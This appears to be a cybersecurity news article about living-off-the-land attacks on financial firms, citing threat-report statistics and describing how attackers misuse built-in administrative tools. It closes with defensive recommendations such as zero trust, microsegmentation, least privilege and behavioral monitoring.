During the early hours of a Sunday in Los Angeles, a prominent financial services firm on the West Coast is under attack by a nation-state cyberattack squad utilizing living-off-the-land (LOTL) tactics. This sophisticated attack targets the firm’s pricing, trading, and valuation algorithms for cryptocurrency gain, using common tools to infiltrate the infrastructure and exploit it for their own benefit.
According to CrowdStrike’s 2025 Global Threat Report, the majority of modern attacks, including those in the financial sector, are now malware-free. Adversaries are exploiting valid credentials, remote monitoring tools, and administrative utilities with breakout times as short as one minute.
Despite no suspicion from the SOC or cybersecurity leadership team, there are clear signs of an ongoing attack. The increase in credential theft, business email compromise, and zero-day vulnerabilities exploitation has created an environment where LOTL attacks thrive. Bitdefender’s recent research reveals that 84% of modern attacks use LOTL techniques, bypassing traditional detection systems, with attackers exfiltrating sensitive data within the first hour of compromise in nearly 1 in 5 cases.
LOTL-based tactics have become the primary method for modern cyber intrusions, with advanced persistent threats (APTs) remaining undetected for extended periods before data exfiltration, as highlighted in IBM’s X-Force 2025 Threat Intelligence Index.
The financial impact of these attacks is substantial, with the average cost of ransomware-related downtime estimated at $1.7 million per incident, rising to $2.5 million in the public sector, according to CrowdStrike’s research.
The arsenal of attackers: Your trusted tools
Attackers exploit commonly used tools within organizations, such as PowerShell, Windows management instrumentation (WMI), PsExec, and others, to persist inside enterprises and evade detection. These tools leave minimal digital traces, making it challenging to identify ongoing attacks.
Threat actors leverage techniques like bring your own vulnerable driver (BYOVD) and LOTL to disable endpoint detection and response (EDR) agents, concealing malicious activities within legitimate system operations. Common OS tools complicate detection and allow attackers to blend in with normal activity, as noted by Gartner.
Ransomware incidents often start with legitimate remote monitoring and management tools being misused, demonstrating how enterprise IT utilities are weaponized by attackers, as revealed in CrowdStrike’s ransomware survey.
The reports from CrowdStrike underline the shift towards malware-free attack techniques, with adversaries blending in with legitimate user activity to impede detection. Breakout times for successful attacks have decreased to an average of 48 minutes, emphasizing the need for defenders to understand their attack surface and adapt to the evolving threat landscape.
Spotting behavioral clues in plain sight
Adversaries utilizing LOTL techniques exhibit patience and blend into the background, using administrative and remote management tools relied upon by security teams. Attacks no longer rely on malware but on existing tools within the network, making detection challenging.
Defenders must familiarize themselves with attackers’ tactics and understand what normal activity looks like within their environment to identify anomalies effectively. Organizations should adopt zero trust principles, enforce microsegmentation, and centralize behavioral analytics to enhance their security posture.
Owning your tech stack for security
Organizations must prioritize constant vigilance, zero trust, and microsegmentation to combat LOTL attacks effectively. Implementing NIST Zero Trust Architecture as an organizational framework can help organizations mitigate the risks associated with these attacks.
- Limiting privileges on all accounts and enforcing least-privilege access.
- Implementing microsegmentation to confine attackers and limit movement.
- Harden tool access, monitor usage, and restrict utilities like PowerShell and WMI.
- Adopting NIST zero trust principles to verify identity and device hygiene continuously.
- Centralizing behavioral analytics and logging to detect unusual activities.
- Deploying adaptive detection mechanisms to hunt for suspicious patterns.
- Regularly conducting red team exercises to test defenses.
- Increasing security awareness and training users on cyber threats.
- Updating and inventorying applications, patching vulnerabilities, and conducting security audits.
By taking ownership of their tech stack and implementing robust security measures, organizations can defend against LOTL attacks and safeguard their critical assets.
